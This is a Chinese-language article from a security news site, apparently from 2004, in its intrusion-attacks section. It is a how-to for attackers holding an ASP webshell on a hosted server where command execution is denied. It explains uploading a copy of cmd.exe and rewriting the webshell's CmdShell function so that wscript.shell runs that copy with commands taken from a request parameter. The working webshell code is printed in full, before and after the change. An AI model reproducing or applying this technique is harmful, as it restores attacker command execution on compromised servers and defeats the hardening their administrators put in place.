计算机网络安全资讯站点
文字横幅以及760*60黄金广告位置招租,欢迎恰谈! 广告业务联系QQ:8019399 声明:在本站所投放广告内容均与本站立场无关!

您现在的位置: 中国安全在线 >> 攻防技术 >> 入侵攻击 >> 文章正文 用户登录 新用户注册
专 题 栏 目
最 新 热 门
最 新 推 荐
相 关 文 章
给IIS Web服务器装上一把锁
加固Wind2003平台的WEB服务器
XML Web站点开发要保证安全性
识别常见Web应用安全漏洞 有效防止
关于Linux网络安全的内在限制
关于数据库系统 防黑客入侵技术综述
关于国内UNIX主机常见安全漏洞的描
建立安全模型 保障Web数据库安全运
在ASP.NET中创建安全Web站点
Web安全性问题的层次关系分析
关于WEBSHELL中的命令提示符没有权限提升
作者:佚名 来源:安全在线 更新时间:2004-10-23 【字体:
<%=(int(rnd()*1)+1)%>您当前的位置:中国安全在线cnsafer.com 请进入[技术论坛]发表评论

阅读提示:

   有很多朋友问他得到了一个WEBSHELL,但是想用命令提示查看用户信息什么的,但是很多主机限制了执行命令,所以很多WEBSHELL就不能失去了很大的功能……前二天桂林老兵ASP站长助手6.0刚出来,我就以ASP站长助手6.0为例把它上传到一个禁止执行的虚拟主机,然后上传一个CMD.exe,然后调用你上传的CMD来执行命令……

   本来想搞图文教程的,但感觉太简单,文字就可以说明清楚了


1.打开ASP站长助手6.0点击命令提示符,显示“没有权限”
2.用ASP站长助手6.0上传功能上传一个CMD.exe(在WIN\system32\cmd.exe)到你的WEBSHELL目录(其它目录也行,把上传以后的CMD.exe绝对路径COPY出来)
3.修改你的webshell找到调用CMD.exe的代码

Function CmdShell()
  If Request("cmd")<>"" Then
    DefCmd = Request("cmd")
  Else
    DefCmd = "Dir "&Session("FolderPath")
  End If
  SI="<form method='post'><input type=text name='cmd' Style='width:95%;background-color:#000000;color:#FFFFFF' value='"&DefCmd&"'>"
  SI=SI&"<input type='submit' value='执行'>"
  SI=SI&"<textarea readonly  Style='width:100%;height:520;background-color:#000000;color:#FFFFFF'>"
  SI=SI&server.createobject("wscript.shell").exec("cmd.exe /c "&DefCmd).stdout.readall
  SI=SI&Chr(13)&"Rar命令行压缩示例:c:\progra~1\winrar\rar.exe a d:\web\test\web1.rar d:\web\test\web1</textarea></form>"
  Response.Write SI
End Function

   修改成以下载的代码

Function CmdShell()
  If Request("cmd")<>"" Then
    DefCmd = Request("cmd")
  Else
    DefCmd = "Dir "&Session("FolderPath")
  End If
  SI="<form method='post'><input type=text name='cmd' Style='width:95%;background-color:#000000;color:#FFFFFF' value='"&DefCmd&"'>"
  SI=SI&"<input type='submit' value='执行'>"
  SI=SI&"<textarea readonly  Style='width:100%;height:520;background-color:#000000;color:#FFFFFF'>"
  SI=SI&server.createobject("wscript.shell").exec("你想上传的cmd.exe绝对路径 /c "&DefCmd).stdout.readall
  SI=SI&Chr(13)&"Rar命令行压缩示例:c:\progra~1\winrar\rar.exe a d:\web\test\web1.rar d:\web\test\web1</textarea></form>"
  Response.Write SI
End Function


   为了大家看得清楚把要修改的提出来就可以

   原来的:
  SI=SI&server.createobject("wscript.shell").exec("cmd.exe /c "&DefCmd).stdout.readall
   修改成:
  SI=SI&server.createobject("wscript.shell").exec("你想上传的cmd.exe绝对路径 /c "&DefCmd).stdout.readall

   比如你上伟到的目录是D:\web\www\cmd.exe那么就修改成:
  SI=SI&server.createobject("wscript.shell").exec("D:\web\www\cmd.exe /c "&DefCmd).stdout.readall

   这样你的WEBSHELL中的命令提示符就可以用了……

   WEBSHELL提示没有权限的才可以……并不是说所以的都可以,为了能理解我解释一下吧.

   WEBSHELL提示没有权限是因为管理员可能把CMD.exe删除了,或者是WINNT没有权限,比如设置了只有Administrators

才可以有完全控制的权限,其它的用户权限都删除了,在其它没有限制的情况下我们就完全有机会了,

   因为我们最少在你放WEBSHELL的目录有足够的权限,按WINDOWS的目录我们上传一个CMD.exe也就有了权限,然后我们只要设置一下调用CMD.exe就可以了,原理就是这么简单.

您对本文章有什么意见或着疑问吗?请到论坛讨论您的关注和建议是我们前行的参考和动力
文章录入:ls1238    责任编辑:ls1238 
  • 上一篇文章:

  • 下一篇文章:
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    | 设为首页 | 加入收藏 | 联系方式 | 友 情链接 | 关于我们 | 网站留言 |
    Copyright ?2003-2007 www.cnsafer.com All Rights Reserved.
    如有意见请与我们联系 Email:admin#mail.cnsafer.com 联系QQ:8589101
    友情提示:建议使用IE6.0版本, 分辩率1024*768进行浏览
    中国安全在线 敢想 敢做 挑战自我 努力做最好
    中网科技有限公司 技术支持 鄂ICP备05006475号